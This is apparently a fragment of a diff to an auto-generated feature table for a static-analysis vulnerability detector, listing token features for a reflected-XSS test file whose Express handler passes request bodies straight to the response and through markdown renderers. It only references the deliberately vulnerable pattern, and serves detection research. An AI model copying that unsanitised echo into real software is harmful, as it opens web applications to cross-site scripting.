autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | doc | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | doc | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | doc | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | doc | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | doc | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | format | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | format | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | format | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | format | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | format | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | html | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | html | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | html | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | html | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | markdown | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | markdown | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | markdown | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | markdown | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | markdown | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | remark | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | remark | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | remark | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | remark | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | remark | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | remark2rehype | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | remark2rehype | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | remark2rehype | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | remark2rehype | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | remark2rehype | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | sanitize | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | sanitize | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | sanitize | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | sanitize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | sanitize | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | this | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | this | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | this | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | unified | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | unified | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | unified | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | unified | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:21 | unified | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:22 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:22 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:22 | res | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:22 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:55:22 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:77:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:77:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:77:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:77:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:77:1 | 'arguments' object of anonymous function | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:77:1 | exceptional return of anonymous function | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:77:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:77:1 | exceptional return of anonymous function | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:77:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:77:1 | exceptional return of anonymous function | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:77:1 | functio ... \\n })\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:77:1 | functio ... \\n })\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:77:1 | functio ... \\n })\\n} | calleeImports | express | @@ -19814,6 +133200,64 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:77:1 | functio ... \\n })\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:77:1 | functio ... \\n })\\n} | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:77:1 | functio ... \\n })\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:77:1 | return of anonymous function | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:77:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:77:1 | return of anonymous function | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:77:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:22:77:1 | return of anonymous function | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:32:55:34 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:32:55:34 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:32:55:34 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:32:55:34 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:32:55:34 | req | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:32:55:34 | req | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:32:55:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:32:55:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:32:55:34 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:32:55:34 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:37:55:39 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:37:55:39 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:37:55:39 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:37:55:39 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:37:55:39 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:37:55:39 | res | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:37:55:39 | res | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:37:55:39 | res | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:37:55:39 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:37:55:39 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:37:55:39 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:37:55:39 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:37:55:39 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:3:56:5 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:3:56:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:3:56:5 | res | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:3:56:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:3:56:5 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:3:56:10 | res.send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:3:56:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:3:56:10 | res.send | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:3:56:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:3:56:10 | res.send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:3:56:20 | exceptional return of res.send(req.body) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:3:56:20 | exceptional return of res.send(req.body) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:3:56:20 | exceptional return of res.send(req.body) | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:3:56:20 | exceptional return of res.send(req.body) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:3:56:20 | exceptional return of res.send(req.body) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:3:56:20 | res.send(req.body) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:3:56:20 | res.send(req.body) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:3:56:20 | res.send(req.body) | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:3:56:20 | res.send(req.body) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:3:56:20 | res.send(req.body) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:7:56:10 | send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:7:56:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:7:56:10 | send | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:7:56:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:7:56:10 | send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:12:56:14 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:12:56:14 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:12:56:14 | req | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:12:56:14 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:12:56:14 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:12:56:19 | req.body | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:12:56:19 | req.body | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:12:56:19 | req.body | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | @@ -19822,6 +133266,121 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:12:56:19 | req.body | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:12:56:19 | req.body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:12:56:19 | req.body | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:16:56:19 | body | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:16:56:19 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:16:56:19 | body | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:16:56:19 | body | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:56:16:56:19 | body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:58:9 | unified | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:58:9 | unified | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:58:9 | unified | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:58:9 | unified | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:58:9 | unified | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:58:11 | exceptional return of unified() | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:58:11 | exceptional return of unified() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:58:11 | exceptional return of unified() | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:58:11 | exceptional return of unified() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:58:11 | exceptional return of unified() | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:58:11 | unified() | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:58:11 | unified() | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:58:11 | unified() | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:58:11 | unified() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:58:11 | unified() | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown 